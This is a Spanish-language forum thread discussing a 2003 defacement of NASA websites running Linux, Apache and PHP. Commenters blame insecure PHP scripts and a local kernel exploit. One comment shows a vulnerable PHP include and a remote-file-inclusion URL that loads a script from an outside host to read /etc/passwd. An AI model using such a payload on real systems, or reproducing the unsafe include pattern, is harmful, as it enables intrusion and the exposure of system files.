Login Barrapunto
'Crackeados' 13 sitios web de la NASA
vplabs nos cuenta: «La noticia se publicó ayer día 22 en El Mundo. Por lo que indican, las webs funcionaban en Apache + PHP sobre Linux. ¿Alguien sabe más del tema? ¿Es alguna vulnerabilidad conocida o nueva? ¿Existen parches para evitar que se reproduzca el ataque? Creo que somos muchos quienes administramos webs justo con este entorno, por lo que el tema requiere toda nuestra atención.» El ataque ocurrió el día 17 de diciembre. Más información, pero no mucha más, en Goverment Computer News.
Este hilo ha sido archivado.
No pueden publicarse nuevos comentarios.
Y recuerda: Los comentarios que siguen pertenecen a las personas que los han enviado. No somos responsables de los mismos.
Siguen cayendo...
(Puntos:1, Redundante)( http://camiloaa.blogspot.com/ )
Si es así, podemos inferir que los administradores son descuidados independientemente del sistema operativo. ¿Qué excusa hay para ser víctima del Blaster casi dos meses después de salir el patch, o ser víctima del 'integer overflow' en linux mes y medio después de haber salido el patch?
Si no es así, y el agujero de seguridad es nuevo, nos encontramos ante un momento crucial en la vida de linux. Tenemos que encontrar el balance entre funciones nuevas y estabilildad de las existentes, de lo contrario linux podría perder presencia y regresar a su nicho original: aficionados :-(.
Nota
(Puntos:3, Informativo)( http://barrapunto.com/ )
En El Mundo (enlazado en la noticia también) hablan de que el S.O. era Linux, pero citando a Panda Software, en cuya referencia tambien hablan de Unix (y no de Linux).
No sé quien tendrá razón, pero no deja de ser curioso.
Fué el grupo brasileño drwxr
(Puntos:4, Informativo)( http://barrapunto.com/~JoseLo/bitacora | Última bitácora: Miércoles, 28 Marzo de 2007, 23:06h )
En realidad fué una protesta por la (pos)guerra de Iraq, y el "defacement" [zone-h.org] incluia un enlace a un video [indymedia.org] en Indymedia-Brasil [indymedia.org]
Y de nuevo el software "implicado" era:
Por lo menos yo voté que NO.
La blogosfera y el Navegante
(Puntos:2, Informativo)( http://www.error500.net/ | Última bitácora: Sábado, 15 Mayo de 2004, 18:47h )
Puede ser la aplicación que corría el servidor
(Puntos:5, Interesante)( http://www.usebox.net/jjm/ | Última bitácora: Viernes, 02 Enero de 2004, 14:20h )
Si pertimos de Linux + Apache + PHP, pero solo se sirve un index.html sin más, seguro que no hay problema, si estás al día en cuanto a temas de seguridad.
Por muy seguro que sea el sistema, desarrollar una aplicación web insegura puede ser un punto de entrada para ataques. Por lo general sé que esto último es frecuente, así que no veo porqué sospechar que el problema está otro sitio (sin más datos, claro). Que aún se hacen barbaridades con system, por ejemplo :P
¿O es que cuando hay agujero en php-nuke (por poner ejemplo) le hechamos la culpa al sistema operativo, al servidor web o al lenguaje en el que está escrito?
En cualquier caso no hay datos, ya depurarán responsabilidades para que no vuelva a pasar. O no, y volverá a pasar XD
Mientras tanto estoy tranquilo con Apache + PHP, que si hay algún problema ya saltará desde un sitio oficial con parches oficiales.
O sino, como esto es open source, el que sospeche que revise el fuente y busque el problema por si mismo ;)
Un saludo.
Free the Mallocs!
PHP include
(Puntos:1, Interesante)index.php
<?
include ( $pagina );
?>
index.php?pagina=http://www.havenard.net/havenard/ hack/cmd.txt?&cmd=cat%20/etc/passwd;
Para solucionarlo verifique lo que incluyen.
Humos subidos
(Puntos:1)( http://www.penedo.tk/ | Última bitácora: Martes, 30 Septiembre de 2003, 19:28h )
Vayamos por partes. Jack el Destripador
Revelado el secreto
(Puntos:1, Troll)( http://barrapunto.com/ | Última bitácora: Domingo, 20 Febrero de 2005, 22:43h )
WTH...
Listos
(Puntos:3, Interesante)( http://barrapunto.com/ | Última bitácora: Viernes, 24 Febrero de 2006, 07:35h )
Algo que llevo ya cierto tiempo comprobando, es que si hay una persona (o grupo) que se consideran muy inteligentes, y que hacen las cosas muy bien, siempre aparecera otra persona o (o grupo) que lo serán todavia mas.
Quiero con esto decir, que a mi modo de ver, es casi imposible hacer un sistema totalmente seguro. Puede que te creas que lo tienes, pero seguro que aparece alguien con tiempo, paciencia e inteligencia suficientes para encontrar un pequeño fallo que hayas cometido (y es muy facil cometerlo), y por ahí colartela.
somos como Dios nos hizo, y alguno somos peor (Siniestro Total)
mas info
(Puntos:1, Informativo)www.cict.nasa.gov; the NASA Advanced Supercomputing Division (Numerical Aerospace Simulation Systems Division)
www.nas.nasa.gov; the NASA Information Power Grid, www.ipg.nasa.gov; and the NASA Research & Education Network,
www.nren.nasa.gov.
Como bien dicen en otro post por ahi fue un grupo
brasileño que aprovechandose de un script en php
gano acceso para utilizar un exploit local que afectaba
a los kernel 2.4.22 publicado una semana antes por
iSEC Security Research consiguio
Segun apuntaban por ahi debido a la falta de presupuesto para la seguridad. Esperemoso que el recorte fuera solo en la seguridad de sus servers 'publicos'.
Links de interes:
http://www.zone-h.org/defacements/mirror/id=700181 /
http://www.gcn.com/vol1_no1/daily-updates/24475-1. html
PD: Esta noticia ya es algo antigua no? 1 semana al menos!
Salud os
Re:Es absolutamente imposible
(Puntos:1)( http://adobo.org/ )
Por muy seguro y estable que sea, eso no quita que pueda haber un fallo que afecte de forma grave a esta seguridad y estabilidad. El código está escrito por personas, y por tanto pueden haber cometido un fallo, cosa que no sería nada rara.
Como bien dices:
[...] características por las cuales es mayoritariamente utilizado en servidores y estaciones de trabajo.
Es por esta razón por la que se levanta tanto revuelo, ya que si se descubre que hay realmente un fallo en apache o en PHP, o incluso en algún otro componente que se use normalmente en los servidores, miles de servidores están expuestos a una vulnerabilidad importante.
Siempre queda la esperanza de que haya sido un error de configuración y que no se haya tratado de un error de programación.
No te pases
(Puntos:1)( http://pbacterio.blogspot.com/ )
Solo tienes que hechar un ojo a la gran cantidad de bugs y parches que suelen tener los proyectos que tienes un desarrollo continuo muy activo.
Un saludo
¿Soy el único que lo ha pillado?
(Puntos:1, Inspirado)Re:Pues sí, Internet va más rápido en Linux
(Puntos:1)( http://www.gvsig.org/ )
¿Qué pasa, que jode menos si sólo se activa para los demás o qué?
Pues mucha gente tiene banda ancha en casa y perderá ese 10%, no creo que sea algo a despreciar...
Yo tengo banda ancha en casa, menos mal que no tengo Windows :-P